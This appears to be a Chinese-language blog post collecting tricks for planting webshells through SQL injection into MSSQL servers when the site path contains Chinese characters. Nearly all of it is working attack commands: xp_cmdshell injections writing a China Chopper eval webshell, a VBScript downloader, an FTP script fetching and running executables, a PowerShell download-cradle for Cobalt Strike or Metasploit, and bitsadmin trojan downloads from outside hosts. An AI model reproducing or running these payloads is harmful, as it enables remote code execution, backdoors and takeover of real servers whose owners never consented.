<

h1 id="sqlmap-shell-" style="font-size:2.4rem;margin:0px 0px 0.5em;font-family:BlinkMacSystemFont, "Lucida Grande", "Segoe UI", Ubuntu, Cantarell, sans-serif;font-weight:300;color:rgb(0, 0, 0);font-style:normal;text-align:start;text-indent:0px;">SQLmap写shell遇到中文路径解决办法集合

假设网站的物理路径是:
c:\wwwroot\网站1\index.aspx

姿势一 手工注入(Chrome)

不能使用firefox的hackbar,因为会出错的。
;exec master..xp_cmdshell 'echo paylaod > c:\wwwroot\网站1\index.aspx'--

姿势二 用下载者下载

原文:http://www.d0cs.org/27.x

  1. echo一个下载者到服务器

    Set Post = CreateObject("Msxml2.XMLHTTP")
    Set Shell = CreateObject("Wscript.Shell")
    Post.Open "GET","http://www.baidu.com/shell.txt",0
    Post.Send()
    Set aGet = CreateObject("ADODB.Stream")
    aGet.Mode = 3
    aGet.Type = 1
    aGet.Open()
    aGet.Write(Post.responseBody)
    aGet.SaveToFile "C:\baidu.bat",2

    shell.txt内容为:
    echo ^<%@ Page Language="Jscript"%^>^<%%eval(Request.Item["chopper"],"unsafe");%^> > c:\wwwroot\网站1\index.aspx
    注: ^符合是为了转义,在特殊字符的前面使用。

  2. 姿势三 把路径换成hex

    利用 burpsuite截获sqlmap写马的包,把路径转成hex。

    姿势四 FTP下载木马

    ;exec master..xp_cmdshell 'echo open 8.8.8.8 21>ftp.txt&&echo 123>> ftp.txt&&echo 123>> ftp.txt&&echo binary>> ftp.txt&&echo get start_yam32.exe>> ftp.txt&&echo get sysinfo.exe>> ftp.txt&&echo bye>> ftp.txt&&ftp -s:ftp.txt&&del ftp.txt&&start_yam32.exe&&sysinfo.exe'--

    姿势五 高权限、高版本

    1. powershell 如果是sa权限、系统是win7及以上,我们可以使用powershell直接上线cobaltstrike或者Metasploit。
      ;exec master..xp_cmdshell 'powershell.exe -nop -W Hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://www.baidu.com/payload64.ps1');payload64"'--

    2. 禁用了powershell的话我们还可以用bitsadmin
      ;exec master..xp_cmdshell 'bitsadmin /transfer n http://www.baidu.com/xiaoma.exe c:\windows\temp\xiaoma.exe'--
      ;exec master..xp_cmdshell 'start /b c:\windows\temp\xiaoma.exe'--

    • 扩展阅读:
      收集整理的15种文件下载的方式
      https://mp.weixin.qq.com/s/DfdUL5jFzJ8PvylxS6mN-A

    启动下载者下载
    ;exec master..xp_cmdshell 'cscript c:\baidu.bat'--

发表评论

电子邮件地址不会被公开。 必填项已用*标注